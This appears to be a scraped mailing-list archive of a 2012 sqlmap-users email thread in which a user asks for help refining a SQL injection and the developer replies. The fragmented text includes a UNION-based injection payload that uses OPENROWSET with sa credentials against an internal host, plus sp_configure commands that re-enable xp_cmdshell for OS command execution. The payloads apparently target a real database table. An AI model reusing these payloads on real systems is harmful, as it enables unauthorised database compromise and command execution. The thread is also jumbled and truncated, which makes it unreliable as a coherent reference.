Hi Adi.
I think that that is really the proper way how to "escape" the single quote
in MsSQL (
http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver)
and you can't use any CHAR() escaping directly inside the OPENROWSET (there
are some ways how to do it via EXEC
htt
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
select * from
OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
select @@version; master..sp_configure ''xp_cmdshell'',1
')),'aaa','15','16','17','18','19','20','21' from teachers7 where
It all depends on context. You'll need to send a sample that you want to
run. Quotes are not interpreted/parsed everywhere the same.
Kind regards
On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu wrote:
> my feeling is that
> "[OLE/DB provider returned message: Deferred prepare could not be
> complete
my feeling is that
"[OLE/DB provider returned message: Deferred prepare could not be completed."
is because of an sql error:) so my fault.
and regarding the second error, I think you must always return some columns in
the query , such as select @@version.
now question is how do i embed a strin
tried, same stuff.
I've tried to reenable xp_cmdshell first with
master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
and got the same error: [OLE/DB provider returned message: Deferred prepare
could not be completed.]
then with 'exec
try with master..resultabcd
i forgot to mention that there needs to be two dots (or schema name in
between) between db name and table name in mssql
On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu wrote:
> Hi Miroslav,
>
> got db_name master and tried with master.resultabcd but i get the same
> erro
Hi Miroslav,
got db_name master and tried with master.resultabcd but i get the same error.
Kind Regards,
A.
From: Miroslav Stampar
To: Adi Mutu
Cc: "sqlmap-users@lists.sourceforge.net"
Sent: Thursday, June 21, 2012 11:11 AM
Subject: Re: [sqlmap-users] err
p.s. find the current database name and prepend to the resultbcd (e.g.
'SELECT output FROM currentdb.resultbcd')
p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via
that OPENROWSET
On Thu, Jun 21, 2012 at 10:11 AM, Miroslav Stampar <
miroslav.stam...@gmail.com
Hi Adi.
You could try prepending the database name to the resultbcd. It seems that
in case of linked server(s) doing that fixes the mentioned problem
(Reference:
http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466
)
Kind
I'm having an injection like this:
openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
select * from
OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
output
10 matches
Mail list logo
